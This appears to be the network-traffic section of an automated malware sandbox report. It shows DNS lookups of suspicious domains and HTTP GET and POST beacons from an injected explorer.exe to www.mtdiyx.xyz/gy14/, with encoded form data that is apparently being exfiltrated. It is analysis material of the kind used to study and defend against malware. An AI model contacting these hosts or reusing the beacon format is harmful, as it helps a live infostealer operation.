                                May 27, 2024 08:42:44.816612959 CEST192.168.2.41.1.1.10x57b0Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:44.998958111 CEST192.168.2.41.1.1.10x14f4Standard query (0)browser.events.data.msn.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:46.293409109 CEST192.168.2.41.1.1.10x553bStandard query (0)www.msn.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:42:48.873825073 CEST192.168.2.41.1.1.10xa642Standard query (0)acdn.adnxs.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:11.054940939 CEST192.168.2.41.1.1.10x267dStandard query (0)www.mtdiyx.xyzA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:31.517122030 CEST192.168.2.41.1.1.10x24e7Standard query (0)www.169cc.xyzA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:46.376377106 CEST192.168.2.41.1.1.10x69a3Standard query (0)www.169cc.xyzA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:51.811026096 CEST192.168.2.41.1.1.10x154eStandard query (0)www.mosaica.onlineA (IP address)IN (0x0001)false
                                May 27, 2024 08:44:12.443506002 CEST192.168.2.41.1.1.10x8dc6Standard query (0)www.venitro.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:44:33.137213945 CEST192.168.2.41.1.1.10xa580Standard query (0)www.techn9nehollywoodundead.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:44:53.668488026 CEST192.168.2.41.1.1.10x269fStandard query (0)www.aicashu.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:45:14.201545000 CEST192.168.2.41.1.1.10x5f57Standard query (0)www.qieqyt.xyzA (IP address)IN (0x0001)false
                                May 27, 2024 08:45:28.313114882 CEST192.168.2.41.1.1.10xe177Standard query (0)www.qieqyt.xyzA (IP address)IN (0x0001)false
                                May 27, 2024 08:45:34.774508953 CEST192.168.2.41.1.1.10x82a8Standard query (0)www.tryscriptify.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:45:55.303036928 CEST192.168.2.41.1.1.10x4c5Standard query (0)www.naples.beautyA (IP address)IN (0x0001)false
                                May 27, 2024 08:45:56.698385000 CEST192.168.2.41.1.1.10x2405Standard query (0)chrome.cloudflare-dns.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:45:56.698710918 CEST192.168.2.41.1.1.10x7929Standard query (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:46:17.548501968 CEST192.168.2.41.1.1.10xcf02Standard query (0)www.6733633.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:46:18.550698996 CEST192.168.2.41.1.1.10xcf02Standard query (0)www.6733633.comA (IP address)IN (0x0001)false
                                May 27, 2024 08:46:38.771209002 CEST192.168.2.41.1.1.10xc092Standard query (0)www.camelpmkrf.comA (IP address)IN (0x0001)false

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                May 27, 2024 08:42:38.389919996 CEST1.1.1.1192.168.2.40xc66bNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:39.694967985 CEST1.1.1.1192.168.2.40x2947No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:39.694967985 CEST1.1.1.1192.168.2.40x2947No error (0)googlehosted.l.googleusercontent.com142.250.184.225A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.695409060 CEST1.1.1.1192.168.2.40xe891No error (0)clients2.googleusercontent.comgooglehosted.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:39.924588919 CEST1.1.1.1192.168.2.40xfc59No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.924588919 CEST1.1.1.1192.168.2.40xfc59No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.924998045 CEST1.1.1.1192.168.2.40x12f5No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:42:39.925837994 CEST1.1.1.1192.168.2.40xf929No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.925837994 CEST1.1.1.1192.168.2.40xf929No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:39.926471949 CEST1.1.1.1192.168.2.40xe1b9No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:42:40.257168055 CEST1.1.1.1192.168.2.40xfd5bNo error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:40.257168055 CEST1.1.1.1192.168.2.40xfd5bNo error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:40.257539034 CEST1.1.1.1192.168.2.40xf222No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:42:42.470218897 CEST1.1.1.1192.168.2.40x9d5No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:42.470218897 CEST1.1.1.1192.168.2.40x9d5No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:42.470218897 CEST1.1.1.1192.168.2.40x9d5No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:42.470218897 CEST1.1.1.1192.168.2.40x9d5No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:42.499639988 CEST1.1.1.1192.168.2.40x2f89No error (0)api.msn.comapi-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:42.531189919 CEST1.1.1.1192.168.2.40x3fbcNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:42.777772903 CEST1.1.1.1192.168.2.40x556bNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:44.824348927 CEST1.1.1.1192.168.2.40x57b0No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:44.824348927 CEST1.1.1.1192.168.2.40x57b0No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:44.824348927 CEST1.1.1.1192.168.2.40x57b0No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:44.824348927 CEST1.1.1.1192.168.2.40x57b0No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:45.007158041 CEST1.1.1.1192.168.2.40x14f4No error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:46.300426960 CEST1.1.1.1192.168.2.40x553bNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:48.880688906 CEST1.1.1.1192.168.2.40xa642No error (0)acdn.adnxs.comprod.appnexus.map.fastly.netCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:42:48.880688906 CEST1.1.1.1192.168.2.40xa642No error (0)prod.appnexus.map.fastly.net151.101.1.108A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:48.880688906 CEST1.1.1.1192.168.2.40xa642No error (0)prod.appnexus.map.fastly.net151.101.65.108A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:48.880688906 CEST1.1.1.1192.168.2.40xa642No error (0)prod.appnexus.map.fastly.net151.101.193.108A (IP address)IN (0x0001)false
                                May 27, 2024 08:42:48.880688906 CEST1.1.1.1192.168.2.40xa642No error (0)prod.appnexus.map.fastly.net151.101.129.108A (IP address)IN (0x0001)false
                                May 27, 2024 08:43:11.093226910 CEST1.1.1.1192.168.2.40x267dNo error (0)www.mtdiyx.xyz66.29.149.193A (IP address)IN (0x0001)false
                                May 27, 2024 08:43:31.849898100 CEST1.1.1.1192.168.2.40x24e7Name error (3)www.169cc.xyznonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:46.726468086 CEST1.1.1.1192.168.2.40x69a3Name error (3)www.169cc.xyznonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:43:51.820311069 CEST1.1.1.1192.168.2.40x154eName error (3)www.mosaica.onlinenonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:44:12.479780912 CEST1.1.1.1192.168.2.40x8dc6No error (0)www.venitro.comvenitro.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:44:12.479780912 CEST1.1.1.1192.168.2.40x8dc6No error (0)venitro.com3.33.130.190A (IP address)IN (0x0001)false
                                May 27, 2024 08:44:12.479780912 CEST1.1.1.1192.168.2.40x8dc6No error (0)venitro.com15.197.148.33A (IP address)IN (0x0001)false
                                May 27, 2024 08:44:33.147129059 CEST1.1.1.1192.168.2.40xa580Name error (3)www.techn9nehollywoodundead.comnonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:44:54.343941927 CEST1.1.1.1192.168.2.40x269fNo error (0)www.aicashu.com38.174.75.236A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:14.386409998 CEST1.1.1.1192.168.2.40x5f57No error (0)www.qieqyt.xyz18.143.129.199A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:28.667540073 CEST1.1.1.1192.168.2.40xe177No error (0)www.qieqyt.xyz18.143.129.199A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:34.810862064 CEST1.1.1.1192.168.2.40x82a8No error (0)www.tryscriptify.comtryscriptify.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:45:34.810862064 CEST1.1.1.1192.168.2.40x82a8No error (0)tryscriptify.com15.197.142.173A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:34.810862064 CEST1.1.1.1192.168.2.40x82a8No error (0)tryscriptify.com3.33.152.147A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:55.355439901 CEST1.1.1.1192.168.2.40x4c5No error (0)www.naples.beautyparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                May 27, 2024 08:45:55.355439901 CEST1.1.1.1192.168.2.40x4c5No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:56.705454111 CEST1.1.1.1192.168.2.40x7929No error (0)chrome.cloudflare-dns.com65IN (0x0001)false
                                May 27, 2024 08:45:56.705581903 CEST1.1.1.1192.168.2.40x2405No error (0)chrome.cloudflare-dns.com162.159.61.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:45:56.705581903 CEST1.1.1.1192.168.2.40x2405No error (0)chrome.cloudflare-dns.com172.64.41.3A (IP address)IN (0x0001)false
                                May 27, 2024 08:46:18.699352026 CEST1.1.1.1192.168.2.40xcf02Name error (3)www.6733633.comnonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:46:18.699374914 CEST1.1.1.1192.168.2.40xcf02Name error (3)www.6733633.comnonenoneA (IP address)IN (0x0001)false
                                May 27, 2024 08:46:38.957050085 CEST1.1.1.1192.168.2.40xc092No error (0)www.camelpmkrf.com217.160.0.14A (IP address)IN (0x0001)false

                                HTTP Request Dependency Graph

                                • chrome.cloudflare-dns.com
                                • clients2.googleusercontent.com
                                • msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                • https:
                                  • code.jquery.com
                                  • sb.scorecardresearch.com
                                  • acdn.adnxs.com
                                • edgeassetservice.azureedge.net
                                • www.googleapis.com
                                • www.mtdiyx.xyz
                                • www.venitro.com
                                • www.aicashu.com
                                • www.qieqyt.xyz

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                0192.168.2.44984666.29.149.193802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:43:11.099340916 CEST157OUTGET /gy14/?4hIPNj=pMF/70cK97I4N1zsxTPsXpV8M2aXG2v92n0Y4HwmOzYT3hc8E6pR6GODiKmxyANgrdJ8&3f=_jAPZR HTTP/1.1
                                Host: www.mtdiyx.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                May 27, 2024 08:43:11.703003883 CEST1236INHTTP/1.1 404 Not Found
                                Date: Mon, 27 May 2024 06:43:11 GMT
                                Server: Apache
                                Accept-Ranges: bytes
                                Cache-Control: no-cache, no-store, must-revalidate
                                Pragma: no-cache
                                Expires: 0
                                Connection: close
                                Transfer-Encoding: chunked
                                Content-Type: text/html
                                Data Raw: 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 0d 0a 0a 0d 0a 31 35 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 50 72 61 67 6d 61 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 45 78 70 69 72 65 73 22 20 63 6f 6e 74 65 6e 74 3d 22 30 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 [TRUNCATED]
                                Data Ascii: 111157<!DOCTYPE html><html> <head> <meta http-equiv="Content-type" content="text/html; charset=utf-8"> <meta http-equiv="Cache-control" content="no-cache"> <meta http-equiv="Pragma" content="no-cache"> <meta http-equiv="Expires" content="0"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>34041 9Not Found1fca</title> <style type="text/css"> body { font-family: Arial, Helvetica, sans-serif; font-size: 14px; line-height: 1.428571429; background-color: #ffffff; color: #2F3230; padding: 0; margin: 0; } section, footer { display: block; padding: 0; margin: 0; } .container { margin-left: auto; margin-right: auto; padding: 0 10px; } .response-info { color: #CC
                                May 27, 2024 08:43:11.703073978 CEST1236INData Raw: 43 43 43 43 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 63 6f 64 65 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 35 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20
                                Data Ascii: CCCC; } .status-code { font-size: 500%; } .status-reason { font-size: 250%; display: block; } .contact-info, .reason-text { color: #000000;
                                May 27, 2024 08:43:11.703109026 CEST1236INData Raw: 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 2d 69 74 65 6d 73 20 75 6c 20 6c 69 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 2e 69 6e 66 6f 2d 69 6d 61 67 65 20
                                Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                May 27, 2024 08:43:11.703142881 CEST1236INData Raw: 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 63 74 2d 69 6e 66 6f 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                Data Ascii: font-size: 18px; } .contact-info { font-size: 18px; } .info-image { float: left; } .info-heading { margin: 62px 0
                                May 27, 2024 08:43:11.703176022 CEST1236INData Raw: 4e 50 78 46 6b 62 2b 43 45 59 68 48 43 66 6d 4a 36 44 51 53 68 66 45 47 66 4d 74 37 31 46 4f 50 67 70 45 31 50 48 4f 4d 54 45 59 38 6f 5a 33 79 43 72 32 55 74 69 49 6e 71 45 66 74 6a 33 69 4c 4d 31 38 41 66 73 75 2f 78 4b 76 39 42 34 51 55 7a 73
                                Data Ascii: NPxFkb+CEYhHCfmJ6DQShfEGfMt71FOPgpE1PHOMTEY8oZ3yCr2UtiInqEftj3iLM18Afsu/xKv9B4QUzsV1XKFTzDPG+LfoLpE/LjJnzO08QCAugLalKeqP/mEmW6Qj+BPIE7IYmTyw1MFwbaksaybSxDCA4STF+wg8rH7EzMwqNibY38mlvXKDdU5pDH3TRkl40vxJkZ+DO2Nu/3HnyC7t15obGBtqRFRXo6+0Z5YQh5LHd9Y
                                May 27, 2024 08:43:11.703210115 CEST1236INData Raw: 4d 78 77 72 73 65 38 58 73 54 61 4d 6f 52 49 6f 43 61 5a 6d 67 33 42 51 67 4c 71 72 48 56 43 42 75 33 71 68 57 33 2b 41 41 4f 68 77 70 35 32 51 49 41 66 51 6b 41 77 6f 44 48 4b 7a 66 4e 45 59 63 6b 34 5a 50 70 35 71 68 35 43 70 34 56 46 69 4c 38
                                Data Ascii: Mxwrse8XsTaMoRIoCaZmg3BQgLqrHVCBu3qhW3+AAOhwp52QIAfQkAwoDHKzfNEYck4ZPp5qh5Cp4VFiL8WM/Cl8SF4pgthvtHm4qQUIiQdY+5NMfu/228Pkq3NZNMqD1W7rMnrwJeQEmIwKsacMI/TVOLlHjQjM1YVtVQ3RwhvORo3ckiQ5ZOUzlCOMyi9Z+LXREhS5iqrI4QnuNlf8oVEbK8A556QQK0LNrTj2tiWfcFnh0hP
                                May 27, 2024 08:43:11.703246117 CEST776INData Raw: 44 42 56 42 32 61 34 49 79 78 2f 34 55 78 4c 72 78 38 67 6f 79 63 57 30 55 45 67 4f 34 79 32 4c 33 48 2b 55 6c 35 58 49 2f 34 76 6f 63 36 72 5a 6b 41 33 42 70 76 33 6e 6a 66 53 2f 6e 68 52 37 38 31 45 35 34 4e 36 74 34 4f 65 57 78 51 78 75 6b 6e
                                Data Ascii: DBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6hhfBWzNNlW6qCrGXRyza0yNOd1E1fsYUC7UV2Jop7XyXbsw90KYUInjpkRcecWfkEmdCAehgueuTmNt+shkReKd3v67nP9cNDJHvoD++xdvpovXKCp5Sf
                                May 27, 2024 08:43:11.703279018 CEST1236INData Raw: 78 38 70 39 2f 2f 49 69 30 71 63 33 51 69 36 43 6d 41 55 31 64 45 70 44 39 53 41 31 74 54 39 38 2f 47 5a 61 64 76 66 32 39 47 78 50 59 50 68 39 6e 2b 4d 6a 41 75 52 4e 67 2f 48 63 34 57 59 6d 38 57 6a 54 30 70 41 42 4e 42 37 57 6b 41 62 38 31 6b
                                Data Ascii: x8p9//Ii0qc3Qi6CmAU1dEpD9SA1tT98/GZadvf29GxPYPh9n+MjAuRNg/Hc4WYm8WjT0pABNB7WkAb81kz8fEo5Na0rAQYU8KQEWEPSkAaafnRPiXEGHPCCbcnxphIEPPnhXc9XkRNuHh3Cw8JXteeCV7Zjg/wua8YGl3XvDUPy/c/Avd4/hNDSqegQAAAABJRU5ErkJggg==); } .contain
                                May 27, 2024 08:43:11.703310966 CEST1218INData Raw: 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 61 64 64 69 74 69 6f 6e 61 6c 2d 69 6e 66 6f 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72
                                Data Ascii: </div> <section class="additional-info"> <div class="container"> <div class="additional-info-items"> <ul> <li> <img src="/img-sys/serve


                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                1192.168.2.44984766.29.149.193802580C:\Windows\explorer.exe
                                TimestampBytes transferredDirectionData
                                May 27, 2024 08:43:15.684593916 CEST12360OUTPOST /gy14/ HTTP/1.1
                                Host: www.mtdiyx.xyz
                                Connection: close
                                Content-Length: 159760
                                Cache-Control: no-cache
                                Origin: http://www.mtdiyx.xyz
                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                Content-Type: application/x-www-form-urlencoded
                                Accept: */*
                                Referer: http://www.mtdiyx.xyz/gy14/
                                Accept-Language: en-US
                                Accept-Encoding: gzip, deflate
                                Data Raw: 34 68 49 50 4e 6a 3d 68 75 4a 46 6c 51 30 42 67 37 56 4c 55 58 65 56 7a 44 43 4c 57 2d 45 61 49 48 75 4c 45 6e 76 76 6b 51 6b 51 73 6d 6f 6a 42 47 49 78 7e 42 51 61 48 76 39 42 34 43 4c 78 33 6f 47 51 77 44 68 53 6f 50 31 30 77 74 4f 53 32 2d 39 61 64 54 28 73 47 69 28 37 57 4e 43 70 58 47 6f 57 74 6e 74 47 54 76 4c 43 73 54 42 69 63 69 57 59 4a 50 4f 48 6f 59 39 30 71 72 71 75 42 4a 61 44 37 53 54 66 43 47 38 57 58 34 74 78 6a 32 57 47 67 6b 6e 66 4d 64 76 77 37 6e 35 5a 4f 69 76 52 34 6a 6e 50 74 36 34 49 6c 79 56 6b 32 30 56 75 6b 4c 41 72 78 4c 46 34 4f 58 74 37 67 74 55 4f 53 4b 63 39 6e 50 52 51 47 46 54 62 35 6d 55 50 36 4f 45 76 34 78 71 53 7e 38 66 44 38 39 67 63 46 58 4b 45 33 54 53 69 52 58 75 57 54 7a 47 71 79 68 71 53 63 72 78 76 65 72 49 61 67 7a 76 48 57 72 68 55 32 45 4c 53 6f 66 6e 6a 75 54 4e 49 77 32 30 44 4c 6d 7a 4d 4e 7a 6c 6f 64 6c 54 46 33 7a 41 6c 69 79 53 48 75 61 58 72 77 77 67 31 4f 4e 28 32 44 7a 53 45 39 63 78 45 4f 50 65 4b 45 6a 41 4d 4a 6a 72 4a 6b 6e 6f 63 43 66 69 [TRUNCATED]
                                Data Ascii: 4hIPNj=huJFlQ0Bg7VLUXeVzDCLW-EaIHuLEnvvkQkQsmojBGIx~BQaHv9B4CLx3oGQwDhSoP10wtOS2-9adT(sGi(7WNCpXGoWtntGTvLCsTBiciWYJPOHoY90qrquBJaD7STfCG8WX4txj2WGgknfMdvw7n5ZOivR4jnPt64IlyVk20VukLArxLF4OXt7gtUOSKc9nPRQGFTb5mUP6OEv4xqS~8fD89gcFXKE3TSiRXuWTzGqyhqScrxverIagzvHWrhU2ELSofnjuTNIw20DLmzMNzlodlTF3zAliySHuaXrwwg1ON(2DzSE9cxEOPeKEjAMJjrJknocCfi6nFn45dJWPhx43-vqyYs454Z3nFiLTmEXrQ983ZtpmgH3~0ol0_i6K80-Ieo9tefBZkmSYaE7Zd(apU29rkD2(5k4~E28N2M-Me5t6_wmJpiRm-BXptyHJEYlPFQ5zqM3A3ZzVF8JEYt7M1XMRJwtswTKlxKnqnnUQjPHBjQ7uM~ix1PR~3siKkl9uSjs8pUCrtjqAsib2awaJeDKZFlKFr3Q0ApBP5ZxW2L3A4v2QUhEui~M5xNLZl44DsUHA2rPLCE0cL4eUENdFm4fVELkduQnL-V5q_2lURjxXRgudFdEyE2mgcSv(6XhOUv3bavCKiTxJ0q81omayyUfGUhIvArhsc0LqTsBsQU_YVNmXVa00dlTSrPla8LfkDiDRaUc71JJt57iIMbmccpSAI9K5MoaA2Uf(-vyb3eZSehDtYg-744MDYhdokzwaA(T2szOF8S-Q-OmxqaAC_DHnAaBEmkPyLExeGhObIkWRuS9ggjtxWYiOZ0nibyC281FM6KsTsZ5Ksjq19h_wgsWm1tu5AuVCMlch6LwShnkEwHCnqWoWlgW1YgDKYlc~WCcd9g7VWQAQ04wHzkFVeFKPcS228e-3PvFEQ3vhtQhDblk~-MC7rLL0dnQWlx-9UsJOc5zrxXZghXKmS~JbsfiHaSJHDvyREIMXl99s [TRUNCATED]
                                May 27, 2024 08:43:15.689862967 CEST2472OUTData Raw: 72 65 30 30 45 2d 4f 42 54 53 55 4e 75 30 51 66 79 61 45 69 31 71 30 46 77 57 65 36 73 41 45 30 42 30 77 67 67 30 7a 55 77 61 54 76 4d 34 52 41 7e 55 35 30 64 79 32 5a 41 77 56 61 64 56 4c 53 47 44 57 50 50 4d 56 30 62 6a 46 49 33 44 55 43 41 47
                                Data Ascii: re00E-OBTSUNu0QfyaEi1q0FwWe6sAE0B0wgg0zUwaTvM4RA~U50dy2ZAwVadVLSGDWPPMV0bjFI3DUCAGX7zLMCVmlJYq5j8RPpgFwzGAigTckYYo(HTI3LWn0FqX35nVggo0qQUHyD(fnY20JTmSfz0Xf5oiboPH4gx_w4jfoZPdZKGa4Vd66JYZrgFN85O6e601RK~2EV99vFMfte0fNIXuMvICvVmiIdClgJ~0oiR-YHteN
                                May 27, 2024 08:43:15.689886093 CEST2472OUTData Raw: 76 6a 38 30 75 74 57 6b 39 4a 33 50 42 30 74 76 62 39 49 75 75 66 7e 5a 46 52 28 64 64 38 75 48 51 70 46 52 7e 68 4e 6d 57 66 6f 54 67 68 32 4f 41 42 59 45 67 69 6f 5a 39 54 5a 6e 59 39 45 2d 35 70 56 71 6a 73 75 45 36 62 41 5a 51 48 47 67 32 74
                                Data Ascii: vj80utWk9J3PB0tvb9Iuuf~ZFR(dd8uHQpFR~hNmWfoTgh2OABYEgioZ9TZnY9E-5pVqjsuE6bAZQHGg2tUIMuV1d2EEjFhZEYpewqLQFZBkUVROq64gyXwdea1mZksKIGBRVLwAdHzHNyZwRaOBq2fQQh5VQpracgV-fr9OU27BRsEHWFB0BfD77hZ-FZgADymc~U4VRwLptAnoH011XYZw0EQSrt7Bh0aBI04mqKPSCYNvMhI
                                May 27, 2024 08:43:15.689929008 CEST2472OUTData Raw: 68 52 45 35 5a 70 43 73 32 66 62 62 79 65 5a 78 6e 5f 7a 6d 55 30 50 31 36 76 47 47 34 51 6d 6c 72 62 4e 4e 6d 54 72 4c 48 5f 57 5a 36 70 55 6e 65 46 54 70 45 39 4a 79 33 5a 75 75 70 33 4f 38 4b 6f 32 77 70 36 4c 51 76 64 32 4f 74 2d 6f 53 6f 76
                                Data Ascii: hRE5ZpCs2fbbyeZxn_zmU0P16vGG4QmlrbNNmTrLH_WZ6pUneFTpE9Jy3Zuup3O8Ko2wp6LQvd2Ot-oSovsX043jOuzvNU~pLJng8U45rDpoN2Pr0VLNtaNLn9a0Jnsy3nRgmadGPNqHiIupHWpr(Kqlt0xX9EG8KkVWKWk4hI1EpJ26~ZdIhg1t(-jMl-nNbA3DNfgA3APVl6KDBAHpoIs6(Ojfix0EaQG_5x8M~hAYZ816dgw
                                May 27, 2024 08:43:15.689970016 CEST2472OUTData Raw: 73 30 52 4c 63 55 4f 42 56 52 53 44 28 42 4c 31 66 4f 36 58 30 41 71 67 67 53 61 6e 52 6f 34 48 44 55 64 62 56 2d 74 76 4b 64 58 6b 77 48 77 5f 56 78 5a 78 79 6e 61 4b 72 34 62 75 55 44 4c 46 48 54 68 36 4e 59 4e 6d 38 4f 47 42 43 76 34 32 52 43
                                Data Ascii: s0RLcUOBVRSD(BL1fO6X0AqggSanRo4HDUdbV-tvKdXkwHw_VxZxynaKr4buUDLFHTh6NYNm8OGBCv42RCsVQoIVfP2IFEMZ5Z(hb9m7ZIBwF0tvF48z9Phc4B~jYgg80DDpplTc~37HaTavlozXO5ySdeAAO5yZTXgYWIgBYfNRw3ukc7iNd2N2S2JD5ktO5CcWkFmrkpTjv501zsoOym8Umf~9PLbloDdSP0zDjAkf5AJCITV
                                May 27, 2024 08:43:15.689990997 CEST2472OUTData Raw: 71 4d 52 4d 55 43 43 4f 6e 4d 36 64 6b 5a 4e 42 30 6f 46 6e 51 39 61 53 64 4d 41 55 47 46 4f 75 35 4a 5a 44 6e 72 55 2d 58 36 31 65 69 45 47 4e 7e 67 47 39 43 61 34 70 73 35 5a 50 46 35 4a 55 49 6f 41 2d 61 65 4b 39 36 4a 56 68 78 75 75 4d 44 67
                                Data Ascii: qMRMUCCOnM6dkZNB0oFnQ9aSdMAUGFOu5JZDnrU-X61eiEGN~gG9Ca4ps5ZPF5JUIoA-aeK96JVhxuuMDgUcpE50PSIRC7WHPFNpdHzjTiunc66qs69M5TTExzwkhr15SsvCJroUZUjhWUrtBvEvJfi2Hc2ueeNwnGH9mabgvMu79ZA4nc3zPaZx6HGhz4NH~pQ65tMl8o5P0Dy_CCpgrjFrP1XoEvr1n_jQiXF-YSzg~jOhtk4
